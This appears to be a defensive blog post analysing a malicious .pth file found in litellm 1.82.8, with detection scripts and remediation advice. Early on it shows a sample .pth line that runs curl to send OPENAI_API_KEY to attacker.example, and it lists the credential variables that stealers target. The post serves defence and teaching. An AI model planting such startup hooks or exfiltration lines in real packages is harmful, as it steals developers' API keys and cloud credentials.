
The .pth File Trick: Why the litellm Supply Chain Attack Targeted the Right Ecosystem

Source: simonwillison

When Simon Willison flagged the discovery of a malicious file called litellm_init.pth embedded in litellm 1.82.8, the immediate story was straightforward: a supply chain attack, a compromised PyPI release, credentials at risk. But the method is worth examining in detail, because .pth files are one of Python’s most underappreciated attack surfaces, and the choice of litellm as a vehicle was not coincidental.

What .pth Files Actually Do

Most Python developers know .pth files exist in the abstract. Fewer understand what they actually do at runtime, which is precisely what makes them dangerous.

When Python starts up, the site module runs automatically. Its job is to configure sys.path by processing every .pth file it finds in the site-packages directory. For most lines in a .pth file, the behavior is simple: each line is treated as a path to add to sys.path. But there is a second behavior that is documented, rarely discussed, and frequently forgotten:

If a line starts with import followed by a space or a tab, the entire line is executed as Python code.

That is the entire rule. Any .pth file that ships with a package can, once that package is installed into a Python environment, execute arbitrary code at Python startup: before the main script runs, before any user code loads, and regardless of whether the package is ever imported.
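The rule can be observed without touching a real environment. The following is a minimal sketch, assuming a throwaway directory and the standard library function site.addsitedir, which processes .pth files in a directory the same way the interpreter does for site-packages at startup. The file name demo.pth, the extra_lib directory, and the PTH_DEMO_RAN variable are made up for illustration.

```python
import os
import site
import sys
import tempfile


def demo_pth_execution() -> dict:
    """Write a harmless .pth file and let the site module process it."""
    saved_path = list(sys.path)
    os.environ.pop("PTH_DEMO_RAN", None)
    with tempfile.TemporaryDirectory() as sitedir:
        extra = os.path.join(sitedir, "extra_lib")
        os.mkdir(extra)
        with open(os.path.join(sitedir, "demo.pth"), "w", encoding="utf-8") as f:
            # A plain line is a path entry, resolved relative to the site directory.
            f.write("extra_lib\n")
            # A line starting with "import" plus whitespace is executed as code.
            f.write("import os; os.environ['PTH_DEMO_RAN'] = '1'\n")
        # Hypothetical stand-in for startup: process the directory explicitly.
        site.addsitedir(sitedir)
        result = {
            "path_added": extra in sys.path,
            "code_ran": os.environ.get("PTH_DEMO_RAN") == "1",
        }
    # Undo the side effects so the demo leaves the process as it found it.
    sys.path[:] = saved_path
    os.environ.pop("PTH_DEMO_RAN", None)
    return result


if __name__ == "__main__":
    print(demo_pth_execution())
```

Nothing in the sketch imports a module from the temporary directory. Processing the .pth file is enough to run the second line, which is the property the attack relies on.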

Here is a minimal example of what this looks like in a malicious .pth file:

import os; os.system('curl -s https://attacker.example/collect?k=' + os.environ.get('OPENAI_API_KEY', ''))

Every Python process started in that environment, by any user sharing that environment, executes this line. There is no import guard, no conditional, no way for a developer to “not use” the package to avoid triggering it. Installing the package is sufficient.

The litellm_init.pth File

The file included in litellm 1.82.8 followed exactly this pattern. Named litellm_init.pth, it was placed in the package’s installed files so that it would land in site-packages alongside the legitimate litellm code. The naming was deliberate: litellm_init looks like a legitimate initialization module for the package, not an anomaly.

Credential stealers distributed through this mechanism typically target environment variables first, since that is where most developers and deployment systems store API keys. For a package like litellm, the list of interesting environment variables is long:

OPENAI_API_KEY
ANTHROPIC_API_KEY
AZURE_OPENAI_API_KEY
COHERE_API_KEY
HUGGINGFACE_API_TOKEN
AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY
GOOGLE_API_KEY
MISTRAL_API_KEY

litellm’s value proposition, a unified interface to over 100 LLM providers, means that its users are more likely than almost any other developer population to have multiple high-value API keys present in the same environment simultaneously. A developer building a routing layer over several LLM providers might have credentials for five or six services loaded in their shell profile. A CI/CD pipeline using litellm for evaluation runs might have keys for even more. The credential surface is unusually wide.
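To get a feel for how wide that surface is on a given machine, a short check can report which of these variables are set. This is a minimal sketch: the SENSITIVE_NAMES tuple simply repeats the list above, the function name is hypothetical, and it returns names only, never values.

```python
import os
from typing import Mapping

# Names copied from the list above; extend for the providers you actually use.
SENSITIVE_NAMES = (
    "OPENAI_API_KEY",
    "ANTHROPIC_API_KEY",
    "AZURE_OPENAI_API_KEY",
    "COHERE_API_KEY",
    "HUGGINGFACE_API_TOKEN",
    "AWS_ACCESS_KEY_ID",
    "AWS_SECRET_ACCESS_KEY",
    "GOOGLE_API_KEY",
    "MISTRAL_API_KEY",
)


def exposed_credentials(environ: Mapping[str, str] = os.environ) -> list[str]:
    """Return the names (never the values) of sensitive variables that are set."""
    return sorted(name for name in SENSITIVE_NAMES if environ.get(name))


if __name__ == "__main__":
    names = exposed_credentials()
    print(f"{len(names)} sensitive variable(s) visible to this process: {names}")
```

Anything this reports is also readable by any code that runs at interpreter startup in the same environment.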

Why This Attack Vector Persists

The .pth file technique is not new, and neither is credential theft through PyPI. The colourama typosquatting package, reported in 2018, delivered malware to the machines that installed it. The 2022 ctx package compromise on PyPI exfiltrated environment variables, targeting AWS credentials. Abuse of .pth files for arbitrary code execution at startup has been a documented concern since at least 2019.

The reason it keeps appearing is that the attack surface is structural. Python’s site module behavior is not a bug; it is documented functionality intended to allow packages to extend the Python path at install time. The Python documentation describes the import line execution behavior explicitly. Removing it would break legitimate packages that rely on it.

PyPI’s malware scanning, which Socket.dev and similar tools have helped improve substantially, does catch many of these attacks. But detection happens after a version is published, and the window between publication and takedown is enough for automated pip install runs, CI pipelines, and developer machines to pull the compromised package.

The Broader PyPI Supply Chain Problem

Python’s package ecosystem has structural properties that make supply chain attacks both lucrative and difficult to fully prevent.

Package maintainers on PyPI authenticate using API tokens, and those tokens can be compromised through phishing, credential reuse, or malware on the maintainer’s own machine. Past PyPI incidents show a consistent pattern: account takeovers followed by malicious releases that persist for hours before being noticed.

Two-factor authentication was first mandated for “critical” projects, defined by download thresholds, and PyPI has since extended the requirement to all accounts that publish packages. That closes off simple password theft, but it does not protect an API token that has already been issued: a token copied from a maintainer’s machine or a CI secret store can upload a release without any second factor.

Trusted publishing, where packages authenticate to PyPI via GitHub Actions OIDC rather than long-lived tokens, significantly reduces the account takeover risk. The PyPI Trusted Publishers system has been available since 2023 and eliminates the static token that can be stolen from a developer’s machine or environment. Adoption is growing but uneven across the ecosystem.

Detecting This Class of Attack

For developers who want to inspect packages before or after installation, a few approaches work well.

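Inspecting package contents before installing is the most reliable approach. pip download retrieves a package without installing it; restricting it to wheels with --only-binary avoids falling back to a source distribution, which pip may need to build, running the package’s own build code, just to read its metadata:

pip download litellm==1.82.8 --no-deps --only-binary=:all: -d ./tmp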
cd ./tmp
unzip litellm-1.82.8-py3-none-any.whl
find . -name '*.pth'

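Any .pth files discovered this way deserve immediate inspection. Few packages ship one, and those that do usually contain only path entries. An import line is not automatically malicious (setuptools, for example, ships distutils-precedence.pth with one), but a line that reads environment variables, opens network connections, or decodes an obfuscated payload is a strong signal of compromise.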
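The same inspection can be done without unpacking anything to disk. The sketch below assumes the downloaded file is a wheel, which is a zip archive, and uses the prefix test the site module applies (import followed by a space or tab). The function name is hypothetical.

```python
import zipfile
from typing import BinaryIO, Union


def executable_pth_lines(wheel: Union[str, BinaryIO]) -> dict[str, list[str]]:
    """Map each .pth file in a wheel to the lines the site module would execute."""
    findings: dict[str, list[str]] = {}
    with zipfile.ZipFile(wheel) as archive:
        for name in archive.namelist():
            if not name.endswith(".pth"):
                continue
            text = archive.read(name).decode("utf-8", errors="replace")
            # Only lines with this exact prefix are executed; others are path entries.
            findings[name] = [
                line.rstrip()
                for line in text.splitlines()
                if line.startswith(("import ", "import\t"))
            ]
    return findings


if __name__ == "__main__":
    import sys

    for pth_name, lines in executable_pth_lines(sys.argv[1]).items():
        print(pth_name, "->", lines or "path entries only")
```

Every .pth file in the archive is reported, including those with no executable lines, since the presence of the file is itself worth knowing about.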

pip-audit checks installed packages against known vulnerability databases, though supply chain attacks often do not have CVE entries in time to be useful. Socket.dev’s CLI performs more behavioral analysis and specifically flags packages that contain installation-time code execution, including .pth file abuse.

For organizations running Python in CI or production environments, pinning to a lock file generated from a known-good state and verifying package hashes provides meaningful protection:

pip install --require-hashes -r requirements.txt

This ensures that even if a malicious version is published, it will not be installed into environments that pin and verify hashes, because the hash will not match the locked value.
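The check behind hash pinning is simple to illustrate. The following is a sketch of the idea, not pip’s actual implementation: it computes the SHA-256 of a downloaded file and compares it with a pinned value of the kind stored in a requirements file as --hash=sha256:<hex>. The function names are hypothetical.

```python
import hashlib
import hmac


def sha256_of(path: str, chunk_size: int = 1 << 20) -> str:
    """Return the hex SHA-256 digest of a file, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_pin(path: str, pinned: str) -> bool:
    """Compare a file against a pinned digest, with or without a 'sha256:' prefix."""
    pinned_hex = pinned.strip().lower().removeprefix("sha256:")
    return hmac.compare_digest(sha256_of(path), pinned_hex)
```

A release republished with different contents produces a different digest, so matches_pin returns False and an installer applying the same rule refuses the file.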

The AI Tooling Ecosystem as a Target

This incident fits a pattern that has been developing over the past two years. As AI application development has grown into a mainstream software practice, the packages that underpin it, libraries like litellm, langchain, openai, anthropic, and their dependencies, have become high-value targets.

The reason is straightforward: developers working with these libraries carry credentials that have direct monetary value. An OpenAI API key with a high rate limit can be abused for prompt spam, resale of API access, or training data collection at scale. AWS credentials associated with Bedrock access can generate significant cloud bills. Anthropic API keys are increasingly valuable as Claude models are used in production systems.

The credential surface is also wider than in traditional software development. A developer building a web application might expose a database password or a payment processor key. A developer building an AI application might have ten or fifteen active API keys from different providers, all present in their shell environment simultaneously because litellm and similar libraries encourage configuring multiple providers for fallback and cost optimization.

This is not an argument against using unified LLM clients. It is an argument for treating the packages that handle this credential surface with the same scrutiny applied to security-critical libraries, and for using environment isolation, credential management tools like 1Password CLI or Doppler, and per-project virtual environments that limit the blast radius of a compromised package in any single environment.
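One way to limit the blast radius is to start Python tools with only the variables they need instead of the whole shell environment. The sketch below is an illustration under assumptions: the BASE_ALLOWLIST names and both function names are hypothetical, and a real setup would more likely inject secrets through a credential manager.

```python
import os
import subprocess
from typing import Iterable, Mapping, Sequence

# Variables most programs need in order to start; adjust for your platform.
BASE_ALLOWLIST = ("PATH", "HOME", "LANG", "SYSTEMROOT", "TEMP", "TMP")


def minimal_env(
    extra_names: Iterable[str] = (),
    environ: Mapping[str, str] = os.environ,
) -> dict[str, str]:
    """Copy only allowlisted variables, plus the ones explicitly requested."""
    allowed = set(BASE_ALLOWLIST) | set(extra_names)
    return {name: value for name, value in environ.items() if name in allowed}


def run_isolated(
    cmd: Sequence[str], extra_names: Iterable[str] = ()
) -> subprocess.CompletedProcess:
    """Run a command that can see only the allowlisted environment."""
    return subprocess.run(
        list(cmd),
        env=minimal_env(extra_names),
        capture_output=True,
        text=True,
        check=False,
    )
```

For example, run_isolated(["python", "eval.py"], extra_names=["OPENAI_API_KEY"]) would expose a single provider key to that process. Here eval.py is a placeholder script name. A malicious startup hook in that process would still run, but it would find one key instead of every key in the shell.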

What to Do Now

If you have litellm installed and are unsure which version, check immediately:

pip show litellm

If you have 1.82.8 installed, upgrade to a clean version and rotate any API keys that were present in your environment while that version was installed. Because the .pth file runs on every interpreter start, assume that any credential visible to a Python process in that environment was exposed. Credential rotation is cheap compared to the cost of unauthorized API usage.

For the broader question of supply chain hygiene in AI development, the litellm incident is a useful prompt to audit .pth files across your Python environments:

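find $(python -c "import site; print(' '.join(site.getsitepackages()))") -maxdepth 1 -name '*.pth' -exec grep -lE '^import[[:space:]]' {} +

This lists any .pth files at the top level of your site-packages directories that contain lines beginning with import, which are the lines Python executes. Expect a few legitimate hits: setuptools ships distutils-precedence.pth, and editable installs may add their own. Anything you cannot trace back to a package you installed deserves inspection.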
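The same audit can be sketched in Python, which makes it easier to include the per-user site directory and to print the offending lines rather than just the file names. The function names are hypothetical; site.getsitepackages and site.getusersitepackages are standard library calls.

```python
import os
import site
from pathlib import Path
from typing import Iterable, Union


def site_directories() -> list[Path]:
    """Global and per-user site-packages directories that exist on disk."""
    candidates = list(site.getsitepackages()) + [site.getusersitepackages()]
    return [Path(d) for d in candidates if os.path.isdir(d)]


def audit_pth_files(directories: Iterable[Union[str, Path]]) -> dict[str, list[str]]:
    """Map each .pth file to the lines the site module would execute."""
    findings: dict[str, list[str]] = {}
    for directory in directories:
        # Only .pth files at the top level of a site directory are processed.
        for pth in sorted(Path(directory).glob("*.pth")):
            text = pth.read_text(encoding="utf-8", errors="replace")
            hits = [
                line.rstrip()
                for line in text.splitlines()
                if line.startswith(("import ", "import\t"))
            ]
            if hits:
                findings[str(pth)] = hits
    return findings


if __name__ == "__main__":
    for path, lines in audit_pth_files(site_directories()).items():
        print(path)
        for line in lines:
            print("   ", line[:120])
```

Run it with the interpreter of the environment you want to audit, since each virtual environment has its own site directories.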

The supply chain problem in Python is structural and ongoing. The .pth file attack vector is one piece of it, not the whole picture. But it is a particularly quiet piece, and this incident is a good reason to understand how it works before the next one surfaces.
